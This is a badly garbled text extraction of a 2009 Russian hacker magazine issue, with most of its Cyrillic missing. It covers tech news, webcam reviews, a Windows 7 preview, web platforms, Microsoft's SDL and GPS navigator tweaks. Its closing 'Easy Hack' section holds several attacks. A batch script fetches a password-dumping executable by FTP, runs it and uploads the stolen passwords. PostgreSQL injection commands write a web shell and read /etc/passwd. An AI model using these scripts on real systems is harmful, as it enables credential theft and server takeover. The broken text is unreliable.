-
01 (121) 2009
WINDOWS . 128
w w w.xakep.ru
01 (121) 2009
WINDOWS
w w w.xakep.ru
. 96
PHP-. 62
WEB-. 26
- GPS-. 36
. 20
x 01(
)2009
121W
ind
oW
s 7/
01 (121) 2009
2009 W
ind
oW
s 7/ 2009
Win
do
Ws 7/
2009
-
-
, . -, : - 10 , --. , , , , , . :).
P.S. X-party . .
nikitozz, . . Xudalite.livejournal.com
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10. 10.
10.
-
092 -
CURL BUILDER C++
096 , ,
-
102
\++
104
108
Syn/AcK112
WAIK: WINDOWS
118
WIN2K8 WSUS 3.0 SP1
122
128 lIvecd:
LINUX
132 pSychO:
136 fAq unIted
FAQ
139
8,5
140
142 x-puZZle
144 www2
WEB-
004 MeGAnewS
ferruM016
-
pc_ZOne020 wIndOwS, 7:
-
026 rIA-
-
032 Sdl, MIcrOSOft
SECURITY DEVELOPMENT LIFECYCLE
036
GPS-
040 eASy hAcK
044
048 qIp
-
052
056
3D-
062
PHP-
066
070 -tOOlS
072
078 x-Stuff
082
086
UBUNTU 8.10 KUBUNTU 8.10:
091 tIpS'n'trIcKS
Content01(121)
WEB-
-
/> nikitozz ([email protected]) >
gorl([email protected])
> Forb ([email protected]) PC_ZONE UNITS step
([email protected])UNIXOID, XAKEP.PRO PSYCHO Andrushock
([email protected]) Dr. Klouniz ([email protected])
Dlinyj([email protected])> ([email protected])
/dvd> Step ([email protected])> unix- Ant >
([email protected])>
/Art>- ([email protected])>
([email protected])>
/xakep.ru> ([email protected])
/> ([email protected] )> ([email protected])
([email protected]) ([email protected])>
([email protected])> ([email protected])
/publishing> ([email protected])> >
([email protected])> ([email protected])>
([email protected])> ([email protected])>
([email protected])> ([email protected])>pr-
([email protected])
/ > ([email protected])> ([email protected] )
> ([email protected]).: (495) 935.70.34: (495)
780.88.24> .: 8 (800) 200.3.999
> 101000, , , / 652, , 77-11802 14 2002 . ScanWeb, . 100 000
. .
. : . , , . .
. .
092 -
CURL BUILDER C++
096 , ,
-
102
\++
104
108
Syn/AcK112
WAIK: WINDOWS
118
WIN2K8 WSUS 3.0 SP1
122
128 lIvecd:
LINUX
132 pSychO:
136 fAq unIted
FAQ
139
8,5
140
142 x-puZZle
144 www2
WEB-
092
032
128
048Content01(121)
-
x 01 /121/ 09
>> meganews>> meganews
Meganews
Mifrill
/ [email protected] /
, , . , . - CD- DVD-. , . , , - . . , , 100 , . , -, , , , .
>> meganews
004
Nokia , , , . Nseries . N97 3.5" QWERTY- . - WiFi, Bluetooth,
GPS, 5- Carl Zeiss, 32 16 (-
microSD-). -, Flash-, , . Nokia A-GPS N97 , , ( ). 2009 , 550
.
ASUS Eee PC 60% .
-
006
IE .
1.91% .
>> meganews>> meganews
100.000 Creative Commons.
, - . 2009 1- . , , . , , - . , , . , , . - , - . , :).
Windows, , - . , , . , Microsoft Windows XP Microsoft Office XP.
, , , , , , . , : 117 . , . , , , , - .
- , , - . . TN Games, - , , - HTX Helmet, . , - FPS. 2009 , . ,
TN Games, , , , - $200, .
x 01 /121/ 09
-
>> meganews
008
>> meganews
9 AOL ICQ- 5.1.
. , , - , - . -, , - . ;-)
- . , , :-), ;), :) . . -, , Nestle , , . (, ) . -, ; -, - , , ,
, . , - , . , -, .
, , -. - . , , , , Lingvo X3 ME, ABBYY . ME Medved Edition, . -
, IT-, - . - - , 490 . , -, ABBYY , - - - .
, - . , , , Windows. , - 250.000 . , , - , . , , , , Microsoft .
. , , . , , -. , , , , .
.
2009 .
x 01 /121/ 09
-
x 01 /121/ 09
>> meganews>> meganews
? , , , . . Facebook , . Facebook (Adam Guerbuez) . , , . , $873
. - Facebook 2008 $300 . , Facebook 4 . -, , , . , , . Facebook , -
, .
Windows 90% : 89.62%.
>> meganews
, . ( ), . , . www.biletam.net . , ( ), . , ! , . , 27 . , - . ,
, , , , , .
-
010
Palm, , , - . , , ; , - . . -
, Palm - Apple , ,
Palm Nova. , Palm Palm OS 5. Nova , 2009 . BlackBerry iPhone, 2%
. , , App Store. -, . , !
-
x 01 /121/ 09
>> meganews
012
>> meganews
512 SDD , 10 , . Toshiba SSD- 64, 128, 256 512 . , 512 , 1.8".
2.5". MLC--, Toshiba 240 \ 200 \ . , AES-. -, , 2009.
, , , . 1250 ( ) 1- 2008, , . : . , , , , . -, , , . , . , ,
YouTube -, - , , , .
, Yahoo! , Microsoft. , . Microsoft $47.5 ., Yahoo! . 2008
Microsoft , . , Yahoo! ( - , 2008 ), - Yahoo! . , , , . , $20 . ,
Microsoft AOL Fox Interactive Media , , , . Microsoft .
1234567. 123456.?
-
x 01 /121/ 09
>> meganews
013
-, EBay. , , . - , - , , - . , , 0000. , . , , . - EBay , , , ,
.
512 SDD
Microsoft , , . . - Windows 7 , , . Device Stage, Jump Lists.
Windows Advanced Rasterization Platform (WARP), DirectX 10 10.1 .
Windows Live, . Windows 7 , Vista, 2010-. -, -, 2009. , . , Vista -
Service Pack 2. , Vista SP1. SP2 2009 . - , , , .
-
x 01 /121/ 09
>> meganews
014
!
Google, Google Chrome, . - , , . Gmail -- ( , ) : Gmail . Chrome
, -, Opera. , , Opera -, Chrome 0.71% 0.83%. , ,
Firefox 3 Chrome. , , Gmail. IE -, , . , 7- , 7- (, Google ). ,
, : Internet Explorer, IE8, - : Firefox 3 Chrome. Chrome Google
Earth. - !
>> meganews
-
,
, -
. 2008 $82 .
- .
, -
10.000. - , ,
- (, ) ,
- . -
, ,
. .
, - - , . , Telstra, , . , . -, , . . - , .
-
>> meganews
015
- . , , -, , . , -, , . , , ? , ,
Grippity. , QWERTY- - . , () . , , -. , Grippity - , , , . .
$100, .
x 12 /120/ 08
. , , Abit - . Abit , 2004 . - - . , - , Universal Scientific
Industrial (USI). USI Abit , , . Abit - , , , . , . 1- 2009 Abit -
.
-
>> ferrum
, , - . , , - - -. Skype , ICQ, Mail- yahoo-messenger. , , . 128
/. , . -, 640480 . , , . , , . , smotri.com - , . , web-. , .
. . . , , , . Skype , , -.
Skype. - , 10 /. ! , . Windows XP Professional SP3 - . . , . ( -
-). , , .
016 x 01 /121/ 09
-
! ,
- .
. -
.
-
>> ferrum
017
Creative, , . . , - , . : , , . - - . . . . . . : , USB . ( ). .
- , .
: : 1,3 :1280 x 1024 : 5 ( ) : 30 / : USB 2.0
Creative Live! Cam Notebook Ultra
x 01 /121/ 09
Genius iSlim 321R : : 0,3 : 640 x 480 : 0,3 ( ) : 30 / : USB
2.0
Genius , - . - . - . ( ). , . - , , , . , . , - . , , . . , , .
: , .
2300 .
750 .
BE
ST
BU
Y
B ES T B U Y B
E ST
BU
Y
EDIT
OR
s C
H OI C E E D I T O R s
CH
OIC
E
-
. - , , , - . . - - 2 . , USB. . , , , - , . , -. . - . , . , :
, . , , , -. , , . : , , .
>> ferrum
x 01 /121/ 09 018
1400 .
. , - , , , -. ( -) , , . - , , . . . , - ( ). . -, , , , . .
.
: : 1,3 : 800 x 600 : 1,3 ( ) : 30 / : USB 2.0
Hercules Deluxe Optical Glass
2200 .
: : 1,3 : 1280 x 1024 : 5 ( ) : 30 / : USB 2.0
Hercules Dualpix Chat and Show
-
, 100% . , - web-, . . Logitech QuickCam Sphere AF. ,
. , ( ), Creative Live! Cam Notebook Ultra -. Microsoft LifeCam
VX-5500 , . ! z
: : 0,3 : 640 x 480 : 1,3 ( ) : 30 / : USB 2.0
Microsoft LifeCam VX-
Microsoft . : , (Russian edition?). -. , . , : . , 0,3 . , : . :
, . , . . : -, , , . : , ( 640480).
x 01 /121/ 09 019
>> ferrum
Logitech. , . -, Carl Zeiss . -, . -, , . -, . , 26-- . - . , ,
, , . . - , .
: : 2 : 1600 x 1200 : 8 ( ) : 30 / : USB 2.0
Logitech QuickCam Sphere AF
BE
ST
BU
Y
B ES T B U Y B
E ST
BU
Y
EDIT
OR
s C
H OI C E E D I T O R s
CH
OIC
E
4600 .
2300 .
-
Vista, Microsoft
Windows 7. !
2010 , preBeta- !
: blAcKcOMb , Windows 7 - Microsoft. , Windows XP Vista .
Windows 7 . ,
, , . Windows 7 Microsoft! 2000 . , , Microsoft BlackComb 2005 ,
2001
WindoWs, 7:
sPider_Net
/ [email protected] /
>> pc_zone
020 x 01 /121/ 09
-
-
, BlackComb Windows LongHorn, Vista. Blackcomb Vienna. , ,
Windows 7 , ! , Microsoft . , , . ; , Vista. -, . PreBeta-- build
6801. Microsoft PDC, -. 6933, - 6801, .
, , -. . 6956, , . , , .
UAC, , , - . . Microsoft, , , - . , (, slow_work=on?), : Windows
7 ! !
Windows 7
WordPad
x 01 /121/ 09 021
>> pc_zone
-
. Pentium 4 ( Vista 40-45 ). . Aero , , . , . - (Visual Studio
2008, Delphi 2009 ..), , . : , ?. , , Vista. , 30 . : -
Windows 7? ! , PreBeta, . : Vista . , 2-3 . , . - , Asus eeeP
.
-. , -. Windows 7 - SuperBar . , , -. .
Vista . - , - -. , . , , - .
- - ( Libraries), - . - . -, -. - , - .
-, . - .
info
(Super Bar)
TC TC
ISE UAC
Windows Media Player
x 01 /121/ 09 022
>> pc_zone
-
. : ? . , , Windows. . . Vista, , . , - , . , , , ( ). : -
.Windows , . -: Word . , Microsoft - SideBar, . , , - .
, Microsoft : MS Paint, , WordPad .. Windows 95. 2010 Microsoft
. , MS Paint ribbon; - - PNG.WordPad , , MS Paint, . , -, , . ,
Windows Media Player. , , - , :).
--, Microsoft - , *nix-. -, ,
- Windows 7 , Windows 7, - . : , , , , . ? Windows 7 , . (- , ,
50% ; ) - AeroSnap (www.aerosnap.de.vu). , Winsplit Revolution
(www.winsplit-revolution.com). UAC, , Vista . , , Nortons User
Account Control (www.nortonlabs.com/inthelab/uac.php). , , , - , .
Life Rocks blog , , , wallpaper, . :
www.nirmaltv.com/2008/11/07/transform-vista-to-windows-7. Aero
Peek, , . , Visual Task Tips (www.visualtasktips.com), Taskix
(taskix.robustit.com).
x 01 /121/ 09 023
>> pc_zone
-
. bat , CScript . 2006 MS PowerShell , .NET Framework. MS.
Windows 7 - - .
Windows -. , Windows Solution Center. -, , . UAC, , - , . ,
.Vista User Account Control, - . ( API-, , ), - . Windows 7, , UAC
. , UAC , . , UAC , .
OutrO by Step , -, - , , , ... . Vista . , Daemon Tools, . . , ,
. , :)P.S. 14- . . z
>>
6801 , Vista. , -. . , , - . , : 1. ( ) - Rafael. 2. Windows.3.
:
> takeown /f %windir%\explorer.exe
> cacls %windir%\explorer.exe /E /G :F
> start unlockProtectedFeatures.exe
4. .
024 x 01 /121/ 09
-
026 x 01 /121/ 09
- rIA () - , : , . , ( , ). , - ( ). , , . ActiveX Microsoft
Java-, , , , . Flash , , , API, . : - - - , , , .
, , . , - (, , , ) Google Chrome , . , , . , Mozilla Prism,
Mozilla Firefox (, ). , Safari . - -, , . Flash-. Adobe AIR, -
Adobe (z, #111).
-
-
. - ,
. AJAX!
-
?
RIA-
/ [email protected] /
>> pc_zone
-
027 x 01 /121/ 09
? , RIA-. RIA Rich Internet Application , , ( -) . , , , , ,
HTML. RIA , -
. , - , , , , , , . , -, - ! :
BrowserPlus Yahoo -,
>> pc_zone
RIA-!
dvd
- Silverlight 2 - :
http://silverlight.net/GetStarted/overview.aspx.
: www.silverlighter.ru, www. silverlight.ru.
Unix- : www.go-mono.com/moonlight.
-! - MS Expression Studio 2 - Microsoft:
expression.microsoft.com.
links
Doom !
-
028 x 01 /121/ 09
RIA- ! , ?
GOOGle GeArS GOOGle: gears.google.com : Firefox, Internet
Explorer Safari, Android Windows Mobile: Google Docs
docs.google.com Google Reader reader.google.com
RememberTheMilk www.rememberthemilk.com Zoho Writer zoho.com -
Wordpress Google ChromeGears , AJAX-. - . , Google Gears -
Titanium (www.titaniumapp.com) - , -- HTML/CSS/JavaScript - , ,
-- -. .
info
Flex
Silverlight Microsoft
Google Gears Yahoo BrowserPlus - , Flash, Silverlight JavaFX
.
RIA - , .
warning
>> pc_zone
-
029 x 01 /121/ 09
, . , Google Docs, WiFi-, - 20. , Gears. , , - Google. , Gears,
, , Google Docs, Wordpress. 2.6, - Gears - . - , . MySpace , ( ,
Gears , , - ). : Google Gears ? . API, - . (-, SQL- , - ), API ,
--, JavaScript- . , , : - , - . Google Gears - , , . , /
( - kernal32.dll, -), ! URL - . : Google Gears . - ,
gears.google.com . Google Chrome , . -, Google Gears Adobe Flash,
.
yAhOO! brOwSer pluS yAhOO : browserplus.yahoo.com : Firefox, IE
6/7,Safari, Chrome, Mac PC: Yahoo!, Flickr
Yahoo! Browser Plus , - - ( JavaScript). Google Gears, , : !.
Gears, BrowserPlus . : - , drag-n-drop, -, . - ImageMagic ,
Photoshop Express Adobe MS Paint. , Ruby, , ( Gears, , , )
Text-to-Speech (, , ). : , , . , , : , - .
MIcrOSOft SIlverlIGht/MOOnlIGht - : microsoft.com/silverlight/ :
Firefox, IE 6/7, Safari, Mac, PC
Gears !
Google Gears , - AJAX- - Gears ( - , ). , Gears : - - , . , -
Google Gears: Dojo Toolkit jQuery ( jquery-offline,
http://code.google.com/p/jquery-offline); ExtJS , , .
>> pc_zone
-
030 x 01 /121/ 09
Linux/Unix: Microsoft NBA iStreamPlanet - sky.com Flash- ,
Microsoft, , ( , , ) .NET Framework, -. MS Silverlight, , Mono,
Linux/Unix Moonlight, . , , Gears BrowserPLus. Silverlight -, .NET.
- ( HD-, DRM-, - - VC-1, WMV, WMA, MP3), ( C#, .NET-), XML , .
DHTML JavaScript, , , Silverlight -, , . API XMLHTTPRequest, AJAX-:
, (, AJAX- server-push Comet ). , - . Silverlight , - JavaScript
API, - , .NET. , Microsoft , -, Silverlight 2, ! , ,
Windows, Mac, Linux.
AdObe flASh/flex : http://www.adobe.com/products : Firefox, IE
6/7, Safari, Mac, PC Linux/Unix: Adobe www.orbismap.com eBay Google
Analytics Flex- http://wiki.flash-ripper.com/?title=_Flex-Flash , ,
. , RIA-- Adobe Flex. Flash, -
Silverlight , ImageCup
>> pc_zone
Quake Native Client (http://code.google.com/p/nativeclient)
Google, x86- ! , , ! Linux ! , Quake . , , :1. Native Client
(http://code.google.com/p/nativeclient);2. Google Chrome Firefox
http://projects.cocaman.net/quake/quake.html.
-
031 x 01 /121/ 09
, , MXML, , GUI-. , Flash Adobe . 10- -. - , Silverlight, , -,
HD, Adobe Pixel Blender! . , , Flash - . , FarCry Crysis ,
Quake/Doom ! Adobe Alchemy -. - - , , , ++. ++
( , , , ). C++ , , 3D-, , , 3D DirectX OpenGL! , ( ,
http://alternativaplatform.com/ru), , . Doom ?
www.newgrounds.com/portal/view/470460.
? . - - (, ) . JavaScript, , , -. , , !. , - , .NET Microsoft. -
Silverlight Adobe Flash/Flex/Alchemy, , (C# .NET Framework
Silverlight 2, ++ Alchemy) . , JavaScript , . , IDE ( , , - ?). ,
RIA- , , , , , , . : -, , ? , , ? :)z
. , - !
>> pc_zone
Sun, - Java JavaFX. RIA-, FxScript. JRE - (, Silverlight Flash),
, -, , - . , Java , JavaFX. , , Sun java-... :
http://www.javafx.com/about/overview
-
032 x 01 /121/ 09
SECURITY DEVELOPMENT LIFECYCLE
2003 , 1.500.000 ,
3.370.000 ,
RPCSS.
, -
,
Senior Development Lead Microsoft.
Microsoft BlackHat, , . . Microsoft -
, , - . : 50000 , Microsoft, . ! , , . , , SDL Security
Development Lifecycle.
Sdl - . , SDL -
SEC(R)2008, . . SDL . , , - best practices , , . : , , , -. SDL
, : , , , , , , . , SDL - , . , ( ). , - , . , , ,
SDL, Microsoft
, 1999 , . , Windows, .
>> pc_zone
-
>> pc_zone
033 x 01 /121/ 09
, !, , - , SDL : Microsoft . . : , ! -. Microsoft Security
Response Center, . , , - , - , - , , RPC, , SDL, . - , ( ) , , -. ,
, . , -, (), - , , . , SDL .
? : SDL ? ,
, :). - SDL Optimization Model, , , , SDL . , SDL ( ), , , - .
C/++ /GS ( ), /SAFESEH (/SafeSEH) SDL. - . Best Pratices /NXCompat,
(DEP) (/NXCompat). , PREfast, FxCop, Application Verifier. PREfast
Visual Studio ( 2005) - /analyze. , _alloca, :
char *b;
do {
b = (char*)_alloca(9)
} while(1)
- , Visual Studio, FxCop
FxCop managed-
SDL
, , , - Blaster, :
WCHAR wszMachineName[N+1] {
WCHAR wszMachineName[N + 1];
LPSTR pwszServerName = wszMachineName;
while (*pwszPath != L\\)
*pwszServerName++ = *pwszPath++;
}
pwszPath, wszMachineName.
-
>> pc_zone
034 x 01 /121/ 09
, .NET Framework ( , ). , - .Application Verifier - unmanaged-.
, . AppVerif , , . , - API, -. - Visual Studio. IDE , , -, strcpy.
:
void func(char *p) {
char d[20];
strcpy(d,p);
// etc
}
*p , . strcpy , ( - ). Visual C++ stdafx.h :
#define _CRT_SECURE_CPP_OVERLOAD_STANDARD_
NAMES 1
, :
void func(char *p) {
char d[20];
strcpy_s(d,__countof(d), p);
// etc
}
, SDL. . , . SDL , - , , .
. , Microsoft SDL, , SDL. , . , - , . , -
Microsoft - SDL (, 3.2, MS 4.0). SDL , -.
info
SDL Threat Modeling Tool
DVD - .
dvd
-
>> pc_zone
035 x 01 /121/ 09
. SDL Threat Modeling Tool Microsoft, , , Visio. , ? - ! , (), ,
. . . , . , , , - . , :
1. ? : .
2. ?
3. - ? ! , , .
, . SDL Threat Modeling Tool , -, . , .
MS , , , , . - , . , , - : API . , , , - ( ). . -, . , , - - . ,
Word doc-, JPEG. JPEG , , , -, , .-, . , Word : doc-, . . -
, , . , , , , Man-in-the-middle . :1. (dumb) . .2. (smart) . , ,
JPEG - - . , , . , . ? . , NDA. : , Microsoft, Peach ( ,
http://peachfuzzer.com). , peach pits ( ) , . : , RPC, COM/DCOM,
SQL- . : FileFuzz, Fuzzing Software
(http://www.fuzzing.org/fuzzing-software); File Fuzzers, Fuzzbox,
Windows IPC Fuzzing Tools, Forensic Fuzzing Tools iSEC Partners
(www.isecpartners.co).
Sdl? ! - , . : - ! z
SDL , SDL , - , , . SDL, , , . Microsoft Microsoft Source Code
Analyzer for SQL Injection XSS Detect Beta. Visual Studio XSS- -.
XSS , : RATSRough Auditing Tool for Security
(http://www.fortify.com/security-resources/rats.jsp) ProxMon
(http://www.fortify.com/security-resources/rats.jsp). :Microsoft
Anti-Cross Site Scripting Library V1.5 for .NET applications
AntiXSS for Java (http://www.gdssecurity.co) :SiteLock ActiveX - -
. Best Practices, ;Banned.h -, , SDL.
Visual Studio 2005, PREfast Visual Studio - /Analyse
-
GPS-
GPS-. , : -
, - .
. -
, !
GPS- Windows Mobile. - .
, GPS-! , , , , - . - POI, - (, , , , .., ..). , . , ,
, , , . , . - , , . , , GPS- , . , - . , , - , . , - , . , GPS--
, - . ,
-
>> pc_zone
036 x 01 /121/ 09
-
037 x 01 /121/ 09
, . , GPS , , !
eMbedded- ( , , , ), ? , , , : GPS-, . : . , . , . .
user-friendly , . , , , -- ( - ). ! Windows,
, , . , ? .
GPS, Voxtel -, ( ) - Voxtel Carrera X433. - , - GPS-, . , - .
,
?navitel.ru , - . , , .
autosputnik.com 2007, . Tele Atlas, . OnLine POI ( , , , ..)
.
iGOi-go.com/ru , . - , , .
TomTomwww.tomtom.com TomTom -, . . - embedded-, , .
Garmin Mobile XTwww.garmin.ru - Nokia, Windows, WinCE. , -.
3.2
iGO 8 3.2
TomTom Navigator
>> pc_zone
-
- , - , Windows CE (WinCE). - Windows , . , , . , Windows CE 32
, . GWES- 5 . , - ( ), GPS-- . , ., ( - PND PNA ), GPS--, BT-, //.
, ( ). ,
, - Windows, : -, .. www.gps-club.ru 4pda.ru, Embedded-, PND-. ,
SD- shell.ini :
\windows\explorer.exe
card-, ActiveSync Microsoft , , - (, USB
. 512 ( -), fat16 - . , , off on. - . , . , , 10-15. , , , .
info
100% gpspassion.com, gps-club.ru 4pda.ru.
links
- , , , . .Visual Studio. Visual Studio ( Express-) Windows CE/
Windows Mobile -, , - .
Platform Builder. , , , . , - . SDK, - Platform Builder.
(SuperH, x86, MIPS, ARM).Embedded Visual C++ (eVC). Visual C++
embedded- Windows CE.
WinCE
Garmin Mobile XT
GPS- -
System Information -
Mio Menu
>> pc_zone
038 x 01 /121/ 09
-
>> pc_zone
039 x 01 /121/ 09
). explorer.exe ( ). !, -. - , , , . Audio, Music, Video
Navitel, . 3.2, -, , . Navitel.exe , - GPS--. ? , - , , , iGo
Igo.exe Navitel.exe. ( )! exe- -. navitel.exe explorer.exe. , , . ,
, , ceDesktop.exe, . Navitel.exe, , :). , , Windows CE 5.0., (
Windows Explorer), , (\DataStorage\CentralAP.exe), - CONF.ini. - .
, , iGo GPS, :
GPSPath= \User\Navitel\Navitel.exe
, , iGO8 :). , ( ) , , . , -
TotalComander WinCE. ? !
? , - , Visual Studio ( ). , , , . Voxtel, , - . , - . , - - .
!MioPocket 2.0
(http://www.gpspassion.com/forumsen/topic.asp?TOPIC_ID=109690) Mio,
. , . , , , , MS Office, - , .. , . : ( ) System Infomation
(http://gpstacho.bettersoft.de)., , , - . : , ? , : - , . ,
Registry Workshop.! z
- , Windows CE, , - , , , , . , :1. PNA;2. , ( , - ..);3.
Mobilenavigator, exe- mobilenavigator.exe;4. . Voxtel Carrera ,
.
GPS-: WindowsCE
-
>>
040
r0id
/ [email protected] /
Easy Hack}
: Sql- MySql: , SQL- - - . , , - . , LIMIT, , , . , , .
GROUP_CONCAT() MySQL => 4.1 . ( concat(), - ). , GROUP_CONCAT()
, - . , 1 (aka 1024 ), group_concat_max_len. , - , -. ,
GROUP_CONCAT():1. .2. , DISTINCT, ORDER BY, ASC/DESC.3. LIMIT.4.
1024 ( ). - GROUP_CONCAT() MySQL => 5 .1. , sql- :
http://www.hacked.com/index.php?id=-1
2. ( , [- -] > [ ] . -, , (00401000) - PUSH 0. 6A 00.
- JMP, PUSH 0
2
-
>>
x 01 /121/ 09
: - : . www.virustotal.com. , , www.virustotal.com ( , 1wmz ). -
:). . :1. ///etc : PHP5 cURL, set_time_limit(); .htaccess; -
(/etc);2. ( , ChaaK) ;3. 777 ./files;4. index.php, - :
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
$updir = 'files'; #
$maxfsize = 2048; #
$sleep = 5; # (-
5)
$abort = 180; #
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
, , . , , :). , www.virustotal.com , . , , ChaaK .
3
041
, 00401026. : jmp 00401026, ( ) EB 24. , , EB 24 6A 00. - XOR (
, , ). EB24 6A00, XOR X: EB24 XOR X = 6A00. - X : X = 6A00 XOR
EB24, X = 8124. , ; - XOR 2481., :1. OllyDBG PUSH 0, 00401000, jmp
00401026, EB24.2. 00401026, , - :
00401026 MOV EAX, 00401000 ; EAX
0040102B MOV EBX, [EAX] ; -
EBX
0040102D XOR EBX,2481 ; XOR
jmp 00401026 PUSH 0
00401033 MOV [EAX],EBX; -
...
00401035 JMP 00401000 ; ...
3. . ! - . , : , - , -, , .
: Sql- pOStGreSql: , MySQL MSSQL, PostgreSQL. . - , . , , ,
PostgreSQL , , , , -, . :1. - ( -
, ).2. ( load_file() MySQL). - . -
- - PostgreSQL, :1. (, table_file).2. - (, ).3. (-) , - -.
PostgreSQL
4
-
>>
042
: pe- ApI-, dll: IID King 2.0, PE- .1. wasm.ru DVD IID King.2. ,
, , Pick a file.3. dll, , Click to pick DLL(s) and their API(s) to
add.4. , API-, Add Them!.5. API
Add Them!, Backup ( bak- ). ! , DLL.
5
x 01 /121/ 09
: exe-: , - . - , , ? , , ExeScript, .bat-, .vbs- .js- -. :1.
DVD.2. .3. ( vbs/js-).4. .5. exe., , -. :
@echo off
Echo open xxx.xxx.
xxx.xxx>go.txt&&echo
ftpuser>>go.txt&&echo
12345>>go.txt&&echo
get passexport.
exe>>go.txt&&echo
bye>>go.txt
Echo open xxx.xxx.xxx.
xxx>send.txt&&echo
ftpuser>>send.txt&&echo
12345>>send.txt&&echo
send pass.txt>>send.
txt&&echo bye>>send.txt
ftp -s:go.txt > nul
passexport.exe pass.txt
ftp -s:send.txt > nul
del go.txt send.txt passexport.txt pass.txt name.bat
, , ? - , .
6
exe
:
CREATE TABLE table_shell(column_shell TEXT NOT NULL);
INSERT INTO column_shell VALUES('');
COPY table_shell (column_shell) TO '/var/www/html/
shell.php';
4. :
COPY (SELECT '') TO 'FILE_
NAME'
, --, . - 1. ( load_file() MySQL):
CREATE TABLE table_file(column_file TEXT NOT NULL);
COPY table_file (column_file) FROM '/etc/passwd';
SELECT * FROM table_file;
2. n m :
